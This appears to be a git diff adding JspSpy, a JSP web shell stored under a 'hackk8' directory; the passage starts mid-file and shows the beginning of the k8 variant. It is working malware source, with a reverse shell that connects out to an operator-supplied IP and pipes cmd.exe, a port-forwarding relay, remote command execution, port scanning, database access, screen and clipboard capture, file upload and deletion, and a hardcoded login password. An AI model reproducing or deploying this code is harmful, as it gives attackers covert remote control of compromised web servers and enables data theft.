(Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); + +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    PortMap >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Local Ip :"+ +" "+ +" Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

    "+ +" "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +ins.get("vmp").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); 
+remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +this.readFromLocal(localIn,remoteOut); +this.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} +public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +response.sendRedirect(SHELL_NAME+"?o=vmp"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); 
+JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "4444"; +if (Util.isEmpty(program)) +program = "cmd.exe"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    Back Connect >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

    "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +response.sendRedirect(SHELL_NAME+"?o=vbc"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

    System Properties >>

    "+ +"
    "+ +"
    "+ +"
      "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
    • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
    • "); +} +out.println("

    System Environment >>


      "); +Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
    • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
    • "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
    Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Remote Control | "+ +" Port Map | "+ +" JSP Env "+ +"
    "); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "); +out.println("

    Shell OnLine »


    "); +out.println("
    "+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ +"
    "+ +"
    "+ +" "+ +"
    "+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
    "+ +" " +); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+Charset.defaultCharset().name()); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//错误信息流。 +Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vRemoteControl",new VRemoteControlInvoker()); +ins.put("gc",new GcInvoker()); +ins.put("vPortScan",new 
VPortScanInvoker());
+ins.put("portScan",new PortScanInvoker());
+ins.put("vConn",new VConnInvoker());
+ins.put("dbc",new DbcInvoker());
+ins.put("executesql",new ExecuteSQLInvoker());
+ins.put("vLogin",new VLoginInvoker());
+ins.put("login",new LoginInvoker());
+ins.put("filelist", new FileListInvoker());
+ins.put("logout",new LogoutInvoker());
+ins.put("upload",new UploadInvoker());
+ins.put("copy",new CopyInvoker());
+ins.put("bottom",new BottomInvoker());
+ins.put("vCreateFile",new VCreateFileInvoker());
+ins.put("vEdit",new VEditInvoker());
+ins.put("createFile",new CreateFileInvoker());
+ins.put("vEditProperty",new VEditPropertyInvoker());
+ins.put("editProperty",new EditPropertyInvoker());
+ins.put("vs",new VsInvoker());
+ins.put("shell",new ShellInvoker());
+ins.put("down",new DownInvoker());
+ins.put("vd",new VdInvoker());
+ins.put("downRemote",new DownRemoteInvoker());
+ins.put("index",new IndexInvoker());
+ins.put("mkdir",new MkDirInvoker());
+ins.put("move",new MoveInvoker());
+ins.put("removedir",new RemoteDirInvoker());
+ins.put("packBatch",new PackBatchInvoker());
+ins.put("pack",new PackInvoker());
+ins.put("unpack",new UnPackInvoker());
+ins.put("vmp",new VmpInvoker());
+ins.put("vbc",new VbcInvoker());
+ins.put("backConnect",new BackConnectInvoker());
+ins.put("jspEnv",new JspEnvInvoker());
+ins.put("smp",new SmpInvoker());
+ins.put("mapPort",new MapPortInvoker());
+ins.put("top",new TopInvoker());
+ins.put("vso",new VOnLineShellInvoker());
+ins.put("online",new OnLineInvoker());
+}
+%>
+<%
+try {
+String o = request.getParameter("o");
+if (!Util.isEmpty(o)) {
+Invoker in = ins.get(o);
+if (in == null) {
+response.sendRedirect(SHELL_NAME+"?o=index");
+} else {
+if (in.doBefore()) {
+String path = request.getParameter("folder");
+if (!Util.isEmpty(path))
+session.setAttribute(CURRENT_DIR,path);
+ins.get("before").invoke(request,response,session);
+ins.get("script").invoke(request,response,session);
+ins.get("top").invoke(request,response,session);
+}
+in.invoke(request,response,session);
+if (!in.doAfter()) {
+return;
+}else{
+ins.get("bottom").invoke(request,response,session);
+ins.get("after").invoke(request,response,session);
+}
+}
+} else {
+response.sendRedirect(SHELL_NAME+"?o=index");
+}
+} catch (Exception e) {
+ByteArrayOutputStream bout = new ByteArrayOutputStream();
+e.printStackTrace(new PrintStream(bout));
+session.setAttribute(CURRENT_DIR,SHELL_DIR);
+Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
    "),"left");
+bout.close();
+out.flush();
+ins.get("bottom").invoke(request,response,session);
+ins.get("after").invoke(request,response,session);
+}
+%>
diff --git a/jsp/hackk8/JSP/other/jspspy_k8.jsp b/jsp/hackk8/JSP/other/jspspy_k8.jsp
new file mode 100644
index 0000000..4cd20f1
--- /dev/null
+++ b/jsp/hackk8/JSP/other/jspspy_k8.jsp
@@ -0,0 +1,2323 @@
+<%@page pageEncoding="UTF-8"%>
+<%@page import="java.io.*"%>
+<%@page import="java.util.*"%>
+<%@page import="java.util.regex.*"%>
+<%@page import="java.sql.*"%>
+<%@page import="java.nio.charset.*"%>
+<%@page import="javax.servlet.http.HttpServletRequestWrapper"%>
+<%@page import="java.text.*"%>
+<%@page import="java.net.*"%>
+<%@page import="java.util.zip.*"%>
+<%@page import="java.awt.*"%>
+<%@page import="java.awt.image.*"%>
+<%@page import="javax.imageio.*"%>
+<%@page import="java.awt.datatransfer.DataFlavor"%>
+<%@page import="java.util.prefs.Preferences"%>
+<%!
+private static final String PW = "k8";
+private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd";
+private static final String REQUEST_CHARSET = "ISO-8859-1";
+private static final String PAGE_CHARSET = "UTF-8";
+private static final String CURRENT_DIR = "currentdir";
+private static final String MSG = "SHOWMSG";
+private static final String PORT_MAP = "PMSA";
+private static final String DBO = "DBO";
+private static final String SHELL_ONLINE = "SHELL_ONLINE";
+private static String SHELL_NAME = "";
+private static String WEB_ROOT = null;
+private static String SHELL_DIR = null;
+public static Map ins = new HashMap();
+private static class MyRequest extends HttpServletRequestWrapper {
+public MyRequest(HttpServletRequest req) {
+super(req);
+}
+public String getParameter(String name) {
+try {
+String value = super.getParameter(name);
+if (name == null)
+return null;
+return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET);
+} catch (Exception e) {
+return null;
+}
+}
+}
+private static class DBOperator{
+private Connection conn = null;
+private Statement stmt = null;
+private String driver;
+private String url;
+private String uid;
+private String pwd;
+public DBOperator(String driver,String url,String uid,String pwd) throws Exception {
+this(driver,url,uid,pwd,false);
+}
+public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws
Exception { +Class.forName(driver); +if (connect) +this.conn = DriverManager.getConnection(url,uid,pwd); +this.url = url; +this.driver = driver; +this.uid = uid; +this.pwd = pwd; +} +public void connect() throws Exception{ +this.conn = DriverManager.getConnection(url,uid,pwd); +} +public Object execute(String sql) throws Exception { +if (isValid()) { +stmt = conn.createStatement(); +if (stmt.execute(sql)) { +return stmt.getResultSet(); +} else { +return stmt.getUpdateCount(); +} +} +throw new Exception("Connection is inValid."); +} +public void closeStmt() throws Exception{ +if (this.stmt != null) +stmt.close(); +} +public boolean isValid() throws Exception { +return conn != null && !conn.isClosed(); +} +public void close() throws Exception { +if (isValid()) { +closeStmt(); +conn.close(); +} +} +public boolean equals(Object o) { +if (o instanceof DBOperator) { +DBOperator dbo = (DBOperator)o; +return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); +} +return false; +} +} +private static class StreamConnector extends Thread { +private InputStream is; +private OutputStream os; +public StreamConnector( InputStream is, OutputStream os ){ +this.is = is; +this.os = os; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[8192]; +int length; +while((length = in.read( buffer, 0, buffer.length ))>0){ +out.write( buffer, 0, length ); +out.flush(); +} +} catch(Exception e){} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){} +} +} +private static class OnLineProcess { +private String cmd = "first"; +private Process pro; +public OnLineProcess(Process p){ +this.pro = p; +} +public void setPro(Process p) { +this.pro = p; +} +public void setCmd(String c){ +this.cmd = c; + +} +public String getCmd(){ 
+return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length ))>0){ +String str = new String(buffer, 0, length); +str = str.replace("&","&").replace("<","<").replace(">",">"); +str = str.replace(""+(char)13+(char)10,"
    "); +str = str.replace("\n","
    "); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuilder html = new StringBuilder(); +if (echoTableTag) +html.append(""); +for (Row r:rows) { +html.append(""); +for (Column c:r.getColumns()) { +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
    "); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append("
    "); +return html.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static double formatNumber(double value,int l) { +NumberFormat format = NumberFormat.getInstance(); +format.setMaximumFractionDigits(l); +format.setGroupingUsed(false); +return new Double(format.format(value)); +} +public static boolean isInteger(String v) { +if (isEmpty(v)) +return false; +return v.matches("^\\d+$"); +} +public static String formatDate(long time) { +SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); +return format.format(new java.util.Date(time)); +} +public static String convertPath(String path) { +return path != null ? path.replace("\\","/") : ""; +} +public static String htmlEncode(String v) { +if (isEmpty(v)) +return ""; +return v.replace("&","&").replace("<","<").replace(">",">"); +} +public static String getStr(String s) { +return s == null ? 
"" :s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +if (msg.indexOf("java.lang.ClassNotFoundException") != -1) +msg = "Can Not Find The Driver!
    " + msg; +out.write("
    "+msg+"
    "); +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private byte[] b = new byte[1024]; +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() { +try { +FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +out.close(); +} catch (IOException ioe) { +ioe.printStackTrace(); +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = 
Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +ins.get("login").invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +ins.get("vLogin").invoke(request,response,session); +return; +} else { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(" "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = 
response.getWriter(); +out.println(""); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (String fs:arr) { +File f = new File(currentDir,fs); +f.delete(); +} +} +JSession.setAttribute(MSG,"Delete Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    System Clipboard »

    "+ +"

    ");
    +try{
    +out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
    +}catch (Exception ex) {
    +out.println("ClipBoard is Empty Or Is Not Text Data !");
    +}
    +out.println("
    "+ +" "+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VRemoteControlInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    Remote Control »

    "+ +" Speed(Second , dont be so fast) Can Not Control Yet."+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//GetScreen +private static class GcInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); +Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); +BufferedImage img = new Robot().createScreenCapture(rec); +response.setContentType("image/jpeg"); +ImageIO.write(img,"jpg",response.getOutputStream()); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
    "+ +"

    PortScan >>

    "+ +"
    "+ +"

    "+ +"IP : Port : Timeout (秒) : "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +ins.get("vPortScan").invoke(request,response,JSession); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (String port:portArr) { +try { +Socket s = new Socket(); +s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); +s.close(); +rs.put(port,"Open"); +} catch (Exception e) { +rs.put(port,"Close"); +} +} +out.println("
    "); +Set> entrySet = rs.entrySet(); +for (Map.Entry e:entrySet) { +String port = e.getKey(); +String value = e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
    "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

